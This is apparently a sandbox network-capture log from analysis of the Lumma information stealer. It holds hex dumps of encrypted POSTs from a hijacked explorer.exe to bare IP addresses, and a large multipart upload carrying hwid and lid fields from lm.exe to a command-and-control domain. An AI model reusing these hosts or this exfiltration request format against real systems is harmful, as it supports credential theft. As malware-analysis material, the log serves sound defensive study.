2024-07-27 05:44:50 UTC	806	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:44:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=36citahuqpbd00c3rron6bcok1; expires=Tue, 19-Nov-2024 23:31:29 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5QpsPDQzP6jvB03AjZeKC7WiurmWRZ0DvRQu2F61ivE2l1THMHb3YqOaCU1rQTdqTrDsRkc4NAX2OZfT%2FLM8fjWUs1nulhRRFz%2BvWZwsRItNBJmQ%2FIuRk3hei0iI7gY9i1qobnt10PE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a51df8e899e08-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 05:44:50 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-27 05:44:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	62307	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:50 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:44:50 UTC	1122	OUT	Data Raw: 45 65 6e 46 57 62 42 56 4b 6f 66 2f 37 45 58 75 73 4c 4d 42 74 6f 46 6f 6f 47 6f 64 77 62 37 77 59 32 4a 72 55 72 70 49 6a 52 75 50 6f 50 78 41 4c 49 55 68 38 77 78 34 63 51 30 2b 6f 64 62 69 66 4d 2b 4b 58 37 34 59 58 55 50 2f 71 36 76 72 56 51 65 4f 6b 6e 76 48 58 44 54 35 46 42 57 46 35 37 31 44 4d 30 70 72 34 41 64 41 2f 30 2b 70 37 35 55 6b 64 49 76 69 44 6d 6a 4c 64 50 47 5a 51 54 6e 4a 6b 43 68 49 42 6e 7a 2b 2b 62 58 73 52 6a 6a 52 52 6d 6d 37 6f 79 54 45 44 54 71 7a 54 43 42 4f 38 75 39 7a 38 35 6c 49 58 71 77 31 4b 38 39 59 2f 56 32 77 6c 45 71 71 59 70 52 63 61 41 61 6a 73 4d 6e 77 4f 75 6e 72 4e 30 58 76 55 47 48 74 54 6d 72 57 69 67 71 4a 65 44 76 65 48 34 75 57 45 30 4d 42 30 6c 68 35 2f 65 55 6a 59 71 56 77 30 78 58 79 44 41 6d 47 58 33 6b Data Ascii: EenFWbBVKof/7EXusLMBtoFooGodwb7wY2JrUrpIjRuPoPxALIUh8wx4cQ0+odbifM+KX74YXUP/q6vrVQeOknvHXDT5FBWF571DM0pr4AdA/0+p75UkdIviDmjLdPGZQTnJkChIBnz++bXsRjjRRmm7oyTEDTqzTCBO8u9z85lIXqw1K89Y/V2wlEqqYpRcaAajsMnwOunrN0XvUGHtTmrWigqJeDveH4uWE0MB0lh5/eUjYqVw0xXyDAmGX3k
2024-07-27 05:44:51 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:51 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:51 UTC	685	IN	Data Raw: 77 47 5a 58 30 48 58 74 38 74 50 41 38 55 65 4d 75 36 2b 62 73 49 42 39 33 4c 61 73 63 35 48 53 38 33 70 6b 32 47 4a 2f 7a 54 62 39 54 52 76 70 54 6f 76 73 4e 6a 37 67 73 75 79 31 6a 58 48 6a 56 61 57 61 6f 77 79 4f 6c 34 76 45 47 56 76 4f 38 68 63 48 55 4f 71 58 4d 43 64 41 6f 57 4c 55 62 56 61 71 43 59 39 6f 71 6c 75 77 30 6f 74 61 35 2b 72 2f 45 65 33 46 39 6f 55 6a 6e 30 51 77 59 63 59 32 45 6a 79 6a 4d 4b 70 50 4c 43 33 45 53 41 77 48 6f 38 2b 4d 31 50 69 6b 41 73 37 6a 4d 64 45 4c 69 2f 58 7a 45 66 46 4c 69 4a 52 34 4f 31 64 6f 71 4b 72 2b 44 54 35 2f 69 6a 4b 50 54 48 6b 6b 36 45 76 63 70 6a 59 41 4c 47 64 38 4b 47 33 6b 41 32 61 64 68 6f 67 6d 36 77 52 66 66 43 33 72 4a 64 30 37 52 37 6f 6f 37 71 54 2f 77 75 58 39 7a 71 73 2f 35 70 61 53 57 70 51 Data Ascii: wGZX0HXt8tPA8UeMu6+bsIB93Lasc5HS83pk2GJ/zTb9TRvpTovsNj7gsuy1jXHjVaWaowyOl4vEGVvO8hcHUOqXMCdAoWLUbVaqCY9oqluw0ota5+r/Ee3F9oUjn0QwYcY2EjyjMKpPLC3ESAwHo8+M1PikAs7jMdELi/XzEfFLiJR4O1doqKr+DT5/ijKPTHkk6EvcpjYALGd8KG3kA2adhogm6wRffC3rJd07R7oo7qT/wuX9zqs/5paSWpQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	62308	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:52 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:44:52 UTC	1267	OUT	Data Raw: 51 6d 38 4f 6e 66 6f 45 75 7a 71 6d 41 53 66 4d 51 70 69 5a 31 45 6b 4c 73 4a 41 79 6b 78 56 6e 6e 72 35 6d 33 4f 74 55 4f 53 54 4f 6d 31 30 42 79 6b 76 37 78 2f 44 6f 33 64 47 41 49 6f 75 44 68 6a 61 6f 6e 59 51 70 6d 44 4f 36 6f 6b 68 65 55 70 33 4c 36 52 44 67 4c 36 58 6a 73 44 78 42 6f 34 75 6f 79 2f 47 6f 72 72 51 77 6e 75 77 70 7a 36 45 6c 68 46 6d 51 41 61 56 42 6b 54 6c 50 6e 73 58 57 2f 6d 66 4a 72 59 47 59 58 45 32 32 49 54 63 58 72 38 34 33 61 2f 36 5a 7a 50 7a 30 31 6c 52 79 4e 43 6d 75 32 6b 49 47 4e 67 4d 6e 31 34 57 62 67 35 77 65 74 57 6a 62 42 58 69 33 35 41 41 6b 55 47 30 55 55 66 53 62 79 54 6d 41 6f 35 4a 49 4b 38 66 59 2b 77 64 52 2b 45 38 4e 6e 30 58 4e 32 31 55 71 5a 56 2f 68 74 35 50 71 2b 55 65 41 46 4f 42 33 69 59 43 58 43 76 57 Data Ascii: Qm8OnfoEuzqmASfMQpiZ1EkLsJAykxVnnr5m3OtUOSTOm10Bykv7x/Do3dGAIouDhjaonYQpmDO6okheUp3L6RDgL6XjsDxBo4uoy/GorrQwnuwpz6ElhFmQAaVBkTlPnsXW/mfJrYGYXE22ITcXr843a/6ZzPz01lRyNCmu2kIGNgMn14Wbg5wetWjbBXi35AAkUG0UUfSbyTmAo5JIK8fY+wdR+E8Nn0XN21UqZV/ht5Pq+UeAFOB3iYCXCvW
2024-07-27 05:44:53 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:53 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:53 UTC	685	IN	Data Raw: 4d 2b 6d 59 6a 4c 71 6b 65 42 2b 6d 6d 41 54 6d 50 30 55 4e 37 37 79 68 41 2f 38 6b 5a 4f 4c 49 68 5a 37 5a 65 67 58 4b 6e 6c 32 36 30 59 6e 4b 39 74 54 36 39 73 70 57 39 76 43 79 65 78 47 78 35 32 69 35 69 61 76 68 33 71 32 5a 50 31 55 2b 58 71 4f 7a 37 64 31 4c 50 45 35 70 68 71 79 74 41 73 6a 68 64 7a 6f 34 57 31 72 55 6c 2b 38 6a 51 36 43 65 64 56 2f 70 62 63 68 4a 75 53 33 6c 74 2b 7a 55 37 65 37 67 7a 6f 78 53 33 48 6c 31 2b 5a 37 65 50 68 6a 73 4b 47 57 41 6a 34 64 65 35 6e 4c 32 67 6b 6e 6f 4f 4e 30 6b 31 39 73 4d 6f 31 7a 59 53 66 73 41 37 54 46 38 65 47 6d 6d 74 32 47 35 6b 2b 33 76 48 75 58 48 43 51 75 75 58 35 42 59 51 6a 53 56 52 44 35 64 63 7a 59 63 69 4d 53 68 50 57 64 6c 6a 61 6f 6d 50 57 41 6a 50 2f 69 33 33 53 4d 4a 6c 66 78 64 6e 73 58 Data Ascii: M+mYjLqkeB+mmATmP0UN77yhA/8kZOLIhZ7ZegXKnl260YnK9tT69spW9vCyexGx52i5iavh3q2ZP1U+XqOz7d1LPE5phqytAsjhdzo4W1rUl+8jQ6CedV/pbchJuS3lt+zU7e7gzoxS3Hl1+Z7ePhjsKGWAj4de5nL2gknoON0k19sMo1zYSfsA7TF8eGmmt2G5k+3vHuXHCQuuX5BYQjSVRD5dczYciMShPWdljaomPWAjP/i33SMJlfxdnsX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	62309	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:54 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:44:54 UTC	1122	OUT	Data Raw: 4f 66 33 39 71 34 4e 34 48 46 76 57 52 54 52 31 45 4e 62 6b 78 6e 53 4b 69 76 77 63 31 4e 54 35 6c 7a 57 65 41 38 65 74 4e 64 6c 6c 56 76 66 37 48 79 2f 47 36 48 61 78 39 36 76 39 71 44 34 51 4e 61 6a 57 62 44 49 76 73 39 75 6d 6b 69 4f 58 6d 79 68 70 51 51 65 71 67 6a 54 54 47 6c 72 62 56 4d 70 4e 61 71 58 35 43 6f 46 69 6f 78 59 74 45 51 48 39 5a 34 66 4a 6a 76 66 54 52 55 61 31 56 54 70 5a 54 74 46 47 4f 30 44 75 72 72 36 56 45 75 42 42 37 48 2f 4f 47 63 43 50 41 37 30 61 6e 50 4d 65 71 36 36 45 33 4b 38 45 64 2b 78 44 55 31 68 6c 6f 5a 47 51 64 55 4c 48 6d 43 4e 6d 56 43 72 4a 51 41 6e 36 41 33 42 63 44 4c 50 50 55 6e 34 6e 67 78 78 61 79 42 38 30 32 31 57 79 73 36 63 2b 69 78 6e 4e 71 6b 30 52 4e 52 6d 79 77 37 39 61 45 48 43 7a 70 56 58 59 39 30 6e Data Ascii: Of39q4N4HFvWRTR1ENbkxnSKivwc1NT5lzWeA8etNdllVvf7Hy/G6Hax96v9qD4QNajWbDIvs9umkiOXmyhpQQeqgjTTGlrbVMpNaqX5CoFioxYtEQH9Z4fJjvfTRUa1VTpZTtFGO0Durr6VEuBB7H/OGcCPA70anPMeq66E3K8Ed+xDU1hloZGQdULHmCNmVCrJQAn6A3BcDLPPUn4ngxxayB8021Wys6c+ixnNqk0RNRmyw79aEHCzpVXY90n
2024-07-27 05:44:55 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:55 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:55 UTC	685	IN	Data Raw: 62 56 4e 62 77 37 4e 68 45 59 41 7a 54 53 62 59 36 65 59 51 48 76 44 6d 4f 43 6d 4d 38 44 4c 71 4a 2f 72 4c 34 70 46 6d 69 6a 61 54 77 49 5a 62 64 46 5a 39 59 4f 75 58 30 45 54 4b 50 76 74 55 72 44 42 4f 47 51 31 56 54 6e 78 2f 2f 64 43 79 45 47 41 47 79 36 55 31 4e 69 53 61 42 73 4d 65 6d 46 65 50 54 56 68 66 78 45 4c 51 73 4a 79 67 79 71 38 72 73 51 4e 4c 4b 34 7a 54 57 43 55 34 45 77 50 70 74 39 2f 6a 36 6a 36 56 76 6d 76 4b 4d 47 74 46 72 45 69 79 70 42 6d 48 70 4e 55 4e 74 37 50 2b 6e 4e 64 79 4d 79 55 57 42 7a 64 42 53 6a 72 50 42 64 65 41 50 62 64 5a 78 7a 31 79 36 74 58 46 39 6c 58 56 2b 71 63 33 62 43 43 4f 35 65 63 33 61 42 32 58 34 75 33 73 67 6f 73 35 36 41 2f 66 4d 77 31 4f 37 65 6b 6a 58 53 49 75 76 39 76 33 56 47 4e 7a 6d 76 76 39 6f 6a 6c Data Ascii: bVNbw7NhEYAzTSbY6eYQHvDmOCmM8DLqJ/rL4pFmijaTwIZbdFZ9YOuX0ETKPvtUrDBOGQ1VTnx//dCyEGAGy6U1NiSaBsMemFePTVhfxELQsJygyq8rsQNLK4zTWCU4EwPpt9/j6j6VvmvKMGtFrEiypBmHpNUNt7P+nNdyMyUWBzdBSjrPBdeAPbdZxz1y6tXF9lXV+qc3bCCO5ec3aB2X4u3sgos56A/fMw1O7ekjXSIuv9v3VGNzmvv9ojl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	62311	172.67.213.85	443	5724	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:55 UTC	288	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 568846 Host: liernessfornicsa.shop
2024-07-27 05:44:55 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 30 37 31 41 33 36 44 41 34 37 32 41 41 31 38 43 30 45 35 46 37 38 34 45 42 46 38 35 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 54 6f 59 72 4a 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AA071A36DA472AA18C0E5F784EBF856B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"qToYrJ----b
2024-07-27 05:44:55 UTC	15331	OUT	Data Raw: 5d 15 2b 4c 25 56 4a 33 96 00 92 9e 84 05 53 1e 87 bd 02 6c 33 05 f0 bb f0 5a df 61 1c 92 d1 db 0a af 31 86 ce 4b d2 f0 bb c9 2e 22 e0 8c 3a 16 c6 71 b1 6b d6 e8 50 c5 ed ab fb b9 6e db 41 6a 90 e3 ff 5b a5 a4 f9 00 dd 7e 57 70 07 0d ea c9 e4 9e 20 e0 b5 85 83 05 68 0a ce 69 61 e1 25 66 ec 9e b4 52 01 88 f7 e7 82 51 ea 31 06 6f c1 d0 b6 cd 12 62 1c 92 ea 15 06 97 12 d3 1c dc 70 a0 41 9e 17 60 8c 8e d9 9e e1 50 02 c9 a9 c0 d4 ed fc 22 4d 9a df e6 e7 e4 b0 87 5f 8c 98 a2 9d 52 5e 8e 5c 28 7a c4 38 fe d5 e2 94 0a 6f 5a 2b 8e 5a 61 2a ab 31 04 cb f4 14 21 36 80 f7 a3 a8 18 53 70 01 c3 a2 a4 6c 35 f8 bb c8 73 6a 1d 89 5c d2 8a 7c 15 ff 98 f1 f8 aa 9d 04 95 cc 48 c7 c2 12 cb 9a 33 ef 96 80 df 1e 9a 36 3a 50 10 fc e8 47 b3 37 8f 8c 04 aa c4 af dd 3c 9a 87 a2 d6 Data Ascii: ]+L%VJ3Sl3Za1K.":qkPnAj[~Wp hia%fRQ1obpA`P"M_R^\(z8oZ+Za*1!6Spl5sj\\|H36:PG7<
2024-07-27 05:44:55 UTC	15331	OUT	Data Raw: 24 6f 59 19 49 63 1f 47 da 98 39 bd 9a ce 68 ff b5 06 cd 21 2c 6f 14 94 c2 be a8 b7 ca 6d 12 70 e4 a6 c2 58 fe 44 44 0b 45 22 d8 4b 82 76 ea 01 ae e3 05 82 8a 94 19 06 7b a5 22 4b 4c d7 32 1f 0d 9b 8a d1 2a e3 d3 cf 2a d7 25 43 04 88 7b ba df e5 37 d1 4d a6 60 a1 18 2d d5 87 78 b9 c2 17 1a b3 1f 0a 45 c6 76 4f 1a 02 1f 24 fa 4d 9d 52 04 62 82 4a ae 29 c5 e8 a0 7b 06 c3 85 66 bf 18 4d 0f 76 ac d3 4b 2c f6 77 9e 67 4a a2 c3 05 79 fb ea e9 7f a9 ba 7e 8f a3 30 0c ca 38 73 73 46 7e ab 6f 8e 59 72 06 a4 11 7e e7 2b 72 73 dd 0c 22 5c 6b 47 a8 d6 f7 07 c8 7b ba ae 47 50 ae 9c e1 ba bc c1 43 a3 af e6 a7 be 8b 5d ae fc 2b e8 67 8b c6 66 bc b7 0b e4 a3 09 67 9e 20 63 ee 60 ee 3e 58 bc 14 93 95 a7 76 27 9e 4d 6a 3d 48 be c0 68 58 38 c1 6e d4 cd 93 08 63 a6 d6 94 7d Data Ascii: $oYIcG9h!,ompXDDE"Kv{"KL2**%C{7M`-xEvO$MRbJ){fMvK,wgJy~08ssF~oYr~+rs"\kG{GPC]+gfg c`>Xv'Mj=HhX8nc}
2024-07-27 05:44:55 UTC	15331	OUT	Data Raw: 10 21 ee ee 1d a0 fa 42 97 d3 ef 2d 43 8a be fa ed 49 89 ed d2 57 7b ea c5 a5 67 57 c3 80 6d 0c 6a 8e 6d d6 9a 57 02 30 d4 df 77 3f 1e 79 c5 74 e9 0b ce 40 1d 68 99 6f de f7 68 9d 70 35 5c 29 35 c5 db 3a 18 e5 bf bb 36 f5 17 41 37 45 50 fc 45 ec 80 2f 38 63 f3 5f d1 e4 e8 f5 8e 3a a3 9c a5 89 66 ab ed a5 a2 8f 4e bc e4 68 f9 dd 25 35 9f b8 66 3b e7 c3 af 17 de fb ef 65 c8 0e 0b de a1 b8 7d 40 f7 22 3f 3f e4 48 3f 20 fc 57 4b 49 dd dc e4 5c a4 ba 86 2e d9 7d bc d1 1b b5 24 72 13 ed 71 cf 35 49 28 a9 41 4f d0 cc 05 8c b5 a9 31 95 ba bd 05 c1 b5 25 d8 79 94 ba 79 5c 86 4e 18 dc f2 bb 73 f2 73 37 8e d9 d3 7e b4 24 6d e1 11 65 6f 77 fb c7 b9 d4 ca 1f 1c 83 38 0b 8a ec d5 e6 bb 3c c5 8b e7 68 7e 65 ad fd e4 4f bb 67 78 fa 2d 7f aa 1e 74 7b f5 c1 56 8d 62 51 da Data Ascii: !B-CIW{gWmjmW0w?yt@hohp5\)5:6A7EPE/8c_:fNh%5f;e}@"??H? WKI\.}$rq5I(AO1%yy\Nss7~$meow8<h~eOgx-t{VbQ
2024-07-27 05:44:55 UTC	15331	OUT	Data Raw: f5 fd b9 38 b8 79 50 47 b8 cb 57 eb 34 c7 47 ca 68 bc cd c1 ab 9c 9c b3 e0 35 34 f2 42 75 a9 36 b9 aa 2c 09 1d 7b 40 75 c4 82 63 13 bc df d9 45 5e 6c f7 ce 9e 56 a6 db 43 6e b3 66 65 de 93 bf c7 4a 32 e0 55 81 9b d5 19 ae b9 10 6f 19 d1 8b 30 98 e3 82 3f cc 18 dc dc 8b 10 02 46 13 b9 50 1d 11 e8 bd 3e c3 47 1c 1c 57 b3 d9 81 3c 0f a5 37 44 fd af 4c da 22 83 02 6e 7b 4d 3a 15 dd 47 82 0f f7 32 9b 78 c0 10 c5 71 d4 5a d5 05 23 bc f3 ee fd a7 c3 ef b5 4d fd b5 24 1d ee 1f 91 b4 b9 a7 f2 5e d9 9c 94 ee 87 fe fb 80 d6 b4 70 32 61 05 62 f8 27 52 f9 fe ff af e4 86 24 28 1d e3 81 f3 c0 e2 9f 81 4b 32 8b 6f 84 18 55 e5 94 94 16 64 31 fc 79 b1 e4 51 11 0f 07 e1 3c d5 fe 89 b3 23 9c f0 5d a2 2c 2b 41 10 f1 67 7b 3a 50 d1 7e 86 24 d6 1a a4 06 6e 45 69 53 0f 7d dc f7 Data Ascii: 8yPGW4Gh54Bu6,{@ucE^lVCnfeJ2Uo0?FP>GW<7DL"n{M:G2xqZ#M$^p2ab'R$(K2oUd1yQ<#],+Ag{:P~$nEiS}
2024-07-27 05:44:55 UTC	15331	OUT	Data Raw: b8 41 90 d2 e4 c6 f7 72 e2 6c e7 e4 d2 da 90 8d 5b c5 fc 3a b3 08 39 a7 3a 09 e1 a6 72 64 85 45 e3 e7 e5 1a 6c b5 7c a1 8b 3d a1 40 ee 59 54 21 a9 d1 c0 c0 57 e0 c7 c1 96 40 aa ba 72 ab b7 76 6d 02 14 ef bd ed f3 2c 4d 0b 19 58 b0 fd 6a 47 ad 88 b5 0c 23 00 b1 ab d6 19 a5 1c ae cf b1 ed e2 98 d2 2f 84 01 41 37 c6 ee f1 f5 dc 3f 72 77 6b d2 a9 5e b1 bb c8 d9 a3 2d 59 a8 44 25 da 50 cc 7e bc ef f2 47 23 9b 6f fa 9e 05 82 86 1a 4d 61 5b 7c 61 a7 db f8 8a f3 0d 67 1d 63 7b 2b b6 1f fc 08 32 fc 21 74 ce 59 f6 57 5d e2 33 e8 77 09 36 b7 32 11 43 00 0f 86 0a e8 ad 6d 83 f2 b6 dc 1f ae 90 70 36 a2 77 10 b7 7e 8b 5e 70 54 e7 f0 96 3e ee 10 c7 1f 35 b1 75 94 5e 64 66 40 32 ac 92 64 44 ef 53 53 9f d5 93 c7 84 c0 3e 3f aa 43 fa a7 98 e7 41 fe 55 8c 1c 21 e6 f8 7d 1e Data Ascii: Arl[:9:rdEl\|=@YT!W@rvm,MXjG#/A7?rwk^-YD%P~G#oMa[\|agc{+2!tYW]3w62Cmp6w~^pT>5u^df@2dDSS>?CAU!}
2024-07-27 05:44:55 UTC	15331	OUT	Data Raw: 3c 84 91 e5 6d 96 b5 0b 99 5e ff 59 4e 91 13 25 ef ea 7a ce 2a f9 ff da 2a 7e e2 64 11 f0 f5 ce e1 bc b8 2a 8f 37 fb da 02 e3 74 fb be 21 f1 ee dc b7 aa ac 61 89 26 d8 85 53 25 c8 48 41 90 87 0e ac 2e cd 48 4a e3 04 21 37 50 e7 36 53 90 ba 9b 0d 9b 28 77 b8 55 f5 50 f4 c7 45 40 58 f5 0e 02 b7 70 32 b3 99 13 1c a8 92 ff 6d d9 2b 1b 1f bd 64 c0 b5 3b cb 43 b2 5e a6 fe f5 af 8f 1f 21 7f ec 8c cf 06 12 c4 7b 6f e0 16 71 c8 f2 5b 8e 69 ee 73 25 f1 d5 78 45 2b 5a 12 63 fd 67 26 3e f2 c9 66 68 0a 22 f9 36 0b b3 39 6e 4b 1a 4a 28 d0 46 c2 cd 07 ac 48 13 74 56 ee ac 96 7e 9b 8f 66 fd 8c 12 bd 89 06 b8 cd d5 9f 69 2c 9f 21 04 fd da e8 d2 e3 9c 7b 81 4c 76 80 73 f5 8f 6b 51 0e bd 60 b1 46 08 5c dd 18 2d f9 58 23 3d 5a a9 d4 b7 59 09 53 1f 03 10 5d 4a 7f c7 01 3c ca Data Ascii: <m^YN%z*~d7t!a&S%HA.HJ!7P6S(wUPE@Xp2m+d;C^!{oq[is%xE+Zcg&>fh"69nKJ(FHtV~fi,!{LvskQ`F\-X#=ZYS]J<
2024-07-27 05:44:55 UTC	15331	OUT	Data Raw: a0 fb 0e f5 27 91 10 22 87 98 77 a2 1e 08 98 83 d7 0d e7 af 85 c2 84 e7 21 fa fc 89 8b 43 15 0e a3 79 e9 04 11 4d 86 42 ba e2 6b 72 82 a7 29 6c 5a 0f 97 49 75 51 b9 ef a6 6d 2e 86 61 60 02 d9 99 ef 57 fb 7f db d3 5a f4 32 7f 24 6c 02 9e 03 73 cf 51 b0 ec fc 99 f1 17 58 98 0f c7 bb 28 8d ed 1c 9f 98 73 65 db 0f 44 1a 10 b5 51 66 62 7d 45 37 ec 6b 5d 94 d2 e7 c6 53 cc 2e 28 5e 52 ca 30 98 53 6f 73 8d b5 af 21 ca 87 ea 5d 12 8c 27 f3 03 5e 81 f5 d8 aa a3 ae f5 9d 66 4d e3 fb 43 1c a5 02 90 98 55 be a2 5e fa 03 4f 7f 12 f6 fa be 45 6f 28 19 d9 9d 1a d7 52 c3 7b 22 1a 68 36 9f 06 bf 95 af ea 97 78 72 5e 94 3d 38 3e 2c d1 ef b4 e9 fc 2f e2 09 a5 70 ff 54 fd 55 01 52 a0 47 0c 63 d8 28 bf a7 24 e0 9a d7 d2 e6 97 44 3c a9 d6 54 2e fd e7 75 da 59 bd a1 66 da 1c 62 Data Ascii: '"w!CyMBkr)lZIuQm.a`WZ2$lsQX(seDQfb}E7k]S.(^R0Sos!]'^fMCU^OEo(R{"h6xr^=8>,/pTURGc($D<T.uYfb
2024-07-27 05:44:55 UTC	15331	OUT	Data Raw: f7 f7 00 fa 60 26 42 4b 82 98 f9 b2 a0 ea f2 7e 00 ff cb 0b a2 0d 26 dd 2b 73 d6 5e 26 b6 90 b5 b1 5c 07 d4 77 4d 1e 81 ed 66 0e 33 52 e0 ea 6e 53 79 88 14 0f 07 21 cb 84 33 2c dd 47 93 e1 d7 64 5e 8c 5d 90 c4 12 a7 f8 3a 7e 25 f8 2d 08 b7 12 10 91 6e 7e 1e f3 0f 54 b8 73 7b 2a d4 3b 1d 3a 96 20 cb 6c 5c a7 89 e0 77 c9 c2 ef 00 ca 6d 28 29 76 eb e0 f3 10 22 fe 06 e3 62 b2 ed 6c 77 d1 b0 1e 5b 46 58 c8 8d 7b f0 da 68 81 70 94 4a 27 e0 4e cc 85 1f 25 c0 5a 86 bf e6 98 9c 57 3a 6d 0d d1 12 a2 42 90 f2 46 a0 0e 55 98 20 42 27 ec bb 54 ff 00 e2 87 f8 f8 05 25 be d5 1c 78 14 2b ff f4 13 38 d0 fb b5 29 1f 65 d6 10 2c c1 79 03 d2 9f 04 ab 22 68 c1 ae 31 8d 2f 9e 0c aa 3b e4 b7 07 f0 cd 26 e5 91 f9 f9 66 b7 e8 51 61 82 c2 4c ed 65 61 be 6f d5 9f e5 19 da fc 74 2a Data Ascii: `&BK~&+s^&\wMf3RnSy!3,Gd^]:~%-n~Ts{;: l\wm()v"blw[FX{hpJ'N%ZW:mBFU B'T%x+8)e,y"h1/;&fQaLeaot
2024-07-27 05:44:55 UTC	15331	OUT	Data Raw: a1 ed fb 02 38 47 cd 56 bc 10 1b 80 7d b4 45 ba ff 3f 40 99 7d ae f5 a8 d0 18 a4 9b 33 36 f4 f6 3f dd 3e 0e 1b df 05 75 0b b2 f9 e7 aa ef 1f be 25 41 d8 6e 14 c0 ed 85 c8 fc 50 c6 9e e8 a1 d8 7c 23 3b 14 0c 87 d9 ee de 66 e9 cf 59 b7 7e 06 d7 87 f0 72 a7 b0 ec 82 ec a3 fb a5 99 b7 1a d4 6c 4e 23 6b 1b e3 be bf f4 cd f1 52 00 7b f0 9c 80 c8 aa c5 18 a9 93 4e be dc 0f cd ae 0e b2 b4 a2 09 0b 7e b2 38 e7 f1 57 f3 db 00 3f 81 f8 6b 84 18 84 0b c6 6d fd 7a 76 69 34 49 84 e2 0b 99 3b e6 67 20 64 1e d6 8b ee 10 6c ca d2 3a 04 0e 5b a7 d7 d6 18 ad 06 a6 35 a1 4d 4b 31 fc f4 46 1e 8a b9 49 31 f7 3c cb 5a 4f fa 74 3d 8d 17 4c 6e a0 67 ec 40 d3 2f 61 8d 05 ca eb a4 5a d9 74 c5 fa 40 59 91 31 9d 37 ca 89 e1 de 52 cc 66 95 79 6f 57 c4 37 fd 56 a5 87 e2 39 0f ae f1 5b Data Ascii: 8GV}E?@}36?>u%AnP\|#;fY~rlN#kR{N~8W?kmzvi4I;g dl:[5MK1FI1<ZOt=Lng@/aZt@Y17RfyoW7V9[
